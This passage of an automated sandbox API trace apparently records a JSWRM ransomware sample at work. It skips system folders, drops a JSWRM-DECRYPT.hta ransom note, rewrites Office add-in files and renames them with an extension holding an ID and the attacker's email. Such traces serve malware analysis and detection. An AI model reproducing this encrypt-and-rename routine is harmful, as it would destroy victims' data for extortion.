ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf145ad52, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf145ad52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1025", cAlternateFileName="")) returned 1 [0126.904] lstrcmpiW (lpString1="1025", lpString2=".") returned 1 [0126.904] lstrcmpiW (lpString1="1025", lpString2="..") returned 1 [0126.904] lstrcmpiW (lpString1="1025", lpString2="...") returned 1 [0126.904] lstrcmpiW (lpString1="1025", lpString2="windows") returned -1 [0126.905] lstrcmpiW (lpString1="1025", lpString2="recovery") returned -1 [0126.905] lstrcmpiW (lpString1="1025", lpString2="perflogs") returned -1 [0126.905] lstrcmpiW (lpString1="1025", lpString2="documents and settings") returned -1 [0126.905] lstrcmpiW (lpString1="1025", lpString2="$RECYCLE.BIN") returned 1 [0126.905] lstrcmpiW (lpString1="1025", lpString2="system volume information") returned -1 [0126.905] lstrcmpiW (lpString1="1025", lpString2="msocache") returned -1 [0126.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1025\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1025\\jswrm-decrypt.hta")) returned 0xffffffff [0126.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1025\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1025\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.906] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.906] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0126.907] CloseHandle (hObject=0x338) returned 1 [0126.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1025\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1025\\jswrm-decrypt.hta")) returned 0x20 [0126.907] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1025\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf145ad52, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf145ad52, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x424e8a1f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x232180 [0126.907] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.907] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf145ad52, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf145ad52, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x424e8a1f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0126.907] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.907] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.907] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x424e8a1f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x424e8a1f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x424e8a1f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.907] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.907] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.907] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.907] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.907] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.907] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.907] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.907] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.908] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.908] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.908] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf145ad52, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf145ad52, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x110c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0126.908] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x240fc0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x2413d0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1025\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1025\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0126.909] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=69824) returned 1 [0126.909] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.909] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x110c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x110c0, lpOverlapped=0x0) returned 1 [0126.921] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.921] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x110c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x110c0, lpOverlapped=0x0) returned 1 [0126.922] CloseHandle (hObject=0x264) returned 1 [0126.922] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1025\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1025\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1025\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1025\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.923] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf145ad52, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf145ad52, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x110c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0126.923] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0126.923] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefee59ce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1026", cAlternateFileName="")) returned 1 [0126.923] lstrcmpiW (lpString1="1026", lpString2=".") returned 1 [0126.923] lstrcmpiW (lpString1="1026", lpString2="..") returned 1 [0126.923] lstrcmpiW (lpString1="1026", lpString2="...") returned 1 [0126.923] lstrcmpiW (lpString1="1026", lpString2="windows") returned -1 [0126.924] lstrcmpiW (lpString1="1026", lpString2="recovery") returned -1 [0126.924] lstrcmpiW (lpString1="1026", lpString2="perflogs") returned -1 [0126.924] lstrcmpiW (lpString1="1026", lpString2="documents and settings") returned -1 [0126.924] lstrcmpiW (lpString1="1026", lpString2="$RECYCLE.BIN") returned 1 [0126.924] lstrcmpiW (lpString1="1026", lpString2="system volume information") returned -1 [0126.924] lstrcmpiW (lpString1="1026", lpString2="msocache") returned -1 [0126.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1026\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1026\\jswrm-decrypt.hta")) returned 0xffffffff [0126.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1026\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1026\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.926] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.926] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0126.927] CloseHandle (hObject=0x338) returned 1 [0126.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1026\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1026\\jswrm-decrypt.hta")) returned 0x20 [0126.927] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1026\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4250ec6e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0126.927] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.927] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4250ec6e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0126.927] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.927] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.927] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4250ec6e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4250ec6e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4250ec6e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.927] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.927] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.927] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.927] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.927] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.927] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.928] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.928] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.928] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.928] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.928] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0126.928] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1026\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1026\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0126.929] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=72288) returned 1 [0126.929] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.929] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0126.940] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.940] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0126.941] CloseHandle (hObject=0x264) returned 1 [0126.941] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1026\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1026\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1026\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1026\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.942] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefee59ce, 